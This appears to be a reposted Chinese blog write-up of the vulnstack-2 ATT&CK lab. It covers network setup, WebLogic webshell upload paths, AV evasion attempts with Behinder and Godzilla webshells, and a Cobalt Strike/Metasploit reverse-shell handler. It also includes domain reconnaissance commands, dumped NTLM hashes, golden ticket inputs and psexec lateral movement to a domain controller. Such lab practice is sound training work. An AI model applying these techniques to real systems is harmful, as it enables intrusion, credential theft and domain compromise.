当前位置:   article > 正文

vlunstack-2(复现红日安全-ATT& CK实战)

vlunstack-2(复现红日安全-ATT& CK实战)

环境搭建

配置信息

DC

IP:10.10.10.10

OS:Windows 2012(64)

应用:AD域

WEB

IP1:10.10.10.80

IP2:192.168.47.131

OS:Windows 2008(64)

应用:Weblogic 10.3.6MSSQL 2008

PC

IP1:10.10.10.201

IP2:192.168.47.130

OS:Windows 7(32)

攻击机

IP:192.168.47.128

WEB,PC 有360和防火墙

网络配置:

内网默认网段为10.10.10.1/24

DMZ默认网段为 192.168.111.1/24

管理员 Administrator / 1qaz@WSX

三台机子的默认密码都是1qaz@WSX,但是web这一台服务器默认密码登录会错误,解决办法是选择v1.3的快照,报错之后点击放弃,然后重启web虚拟机就可以进了。

同时需要在web机开启weblogic服务

内网

首先添加一个vm2的内网自定义,设置子网为10.10.10.1/24

当虚拟机开启时,会采用已经设定过的ip地址(必须符合10.10.10开头

将DC,PC,WEB 设为 vm2 (内网环境)

外网

内网设置好了,外网这样设置

我设置的外网连接方式为NAT

将 攻击机,PC,WEB 外网设置为NAT,为了与kali在同一网段

PC与WEB做修改如下:

Dc:

Pc

Win

开启web服务

开启WEB的服务:管理员身份运行

C:\Oracle\Middleware\user_projects\domains\base_domain

信息收集

Nmap端口扫描

nmap -T4 -A -p 1-65535 192.168.163.137

由nmap扫描结果可知:

端口扫描

80,1433,3389,,7001,60966等

服务版本识别

IIS httpd 7.5,SQL Server 2008 R2 SP2,远程桌面服务,WebLogic Server

操作系统信息识别

Windows Server 2008 R2 - 2012

de1ay.com

工具检测发现漏洞

Dir查看路劲

查看进程

木马获取shell

weblogic上传木马路径选择:weblogic上传路径

方法1:把shell写到控制台images目录中:

\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp              //目录上传木马

访问 http://192.168.163.137:7001/console/framework/skins/wlsconsole/images/shell.jsp

方法2:写到uddiexplorer目录中

\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\随机字符\war\shell.jsp   //目录写入木马,

访问 http://*.*.*.*:7001/uddiexplorer/shell.jsp

方法3:在应用安装目录中

\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\项目名\随机字符\war\shell.jsp   //目录写入木马,

访问 http://*.*.*.*:7001/项目名/shell.jsp

这里选择第一种

上传木马

被360查杀了

给冰蝎做免杀

GitHub - Tas9er/ByPassBehinder: ByPassBehinder / 冰蝎WebShell免杀生成 / Code By:Tas9er

生成木马

C:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp

查看生成成功了

但是太老了还是被查杀了

只能关闭360了不然免杀都不会做

冰蝎尝试一直失败

用哥斯拉

连接成了

cs生成监听器反弹到cs客户端

哥斯拉上传cs木马文件

Cs端收到回连

接着用ms-15权限提升

域内信息

1). 本机信息收集

1). 本机信息收集

shell Systeminfo  //查看操作系统信息

shell Ipconfig /all   //查询本机ip段,所在域等

shell Whoami   //查看当前用户权限

shell Net user //查看本地用户

shell Net localgroup administrators //查看本地管理员组(通常 包含域用户)

得知web服务器为Windows server 2008 有两个网段

2). 域内信息收集

net config workstation     // 查看当前计算机名,全名,用户名,系统版本,工作站域,登陆的域等

net view /domain              // 查看域

net time /domain           // 主域服务器会同时作为时间服务器

net user /domain      // 查看域用户

net group /domain     // 查看域内用户组列表

net group "domain computers" /domain      // 查看域内的机器

net group "domain controllers" /domain          // 查看域控制器组

net group "Enterprise Admins" /domain    // 查看域管理员组

域名为de1ay.com 存在两台域主机web和pc 域控为DCde1ay.com主机名为DC,域管理员为Administrator

接下来将通过 Win7 跳板机,横向渗透拿下内网域内的域成员主机和域控主机。

内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )_msfconsole的background挂起会话后怎么启动会话-CSDN博客icon-default.png?t=N7T8https://blog.csdn.net/weixin_54977781/article/details/131178720?ops_request_misc=%7B%22request%5Fid%22%3A%22172250449416800213084897%22%2C%22scm%22%3A%2220140713.130102334.pc%5Fall.%22%7D&request_id=172250449416800213084897&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-1-131178720-null-null.142^v100^pc_search_result_base9&utm_term=cobalt strike4.7%E8%81%94%E5%8A%A8msf&spm=1018.2226.3001.4187

服务器安装msf

chmod 755 msfinstall.sh && ./msfinstall.sh

会话转移

(1)msfconsole                    // 打开 MSF 工具

(2)use exploit/multi/handler                                   // 设置 监听 模块.

(3)set payload windows/meterpreter/reverse_http                // 设置 payload

(4)set lport 4444                     // 设置一个端口(和上面的监听一样的端口)

(5)set lhost 0.0.0.0                    // 设置本地的 IP 地址

(6)exploit                              // 进行测试

Cs生成外联监听器

权力委派上线成功

新建会话

Cs抓取密码凭证

权限维持

记录域名DE1AY.com的SID值

Authentication Id : 0 ; 158137 (00000000:000269b9)

Session           : Service from 0

User Name         : mssql

Domain            : DE1AY

Logon Server      : DC

Logon Time        : 2024/8/5 7:02:10

SID               : S-1-5-21-2756371121-2868759905-3853650604-2103

hashdump

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

de1ay:1000:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

 制作黄金票据

Administrator

DE1AY.com

S-1-5-21-2756371121-2868759905-3853650604-2103

31d6cfe0d16ae931b73c59d7e0c089c0

用于权限维持

横向渗透

smb渗透

端口扫描

目标列表查看

创建smb监听

右击会话—jump—psexec64(PC为32位,需要使用psexec)

10.10.10.10上线成功了

再次端口扫描发现

10.10.10.201

同样的方法上线成功了

思考总结:

免杀不会,外网打点信息收集不全,横向不熟练,渗透框架还不够结实

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/Li_阴宅/article/detail/1019188
推荐阅读
相关标签
  

闽ICP备14008679号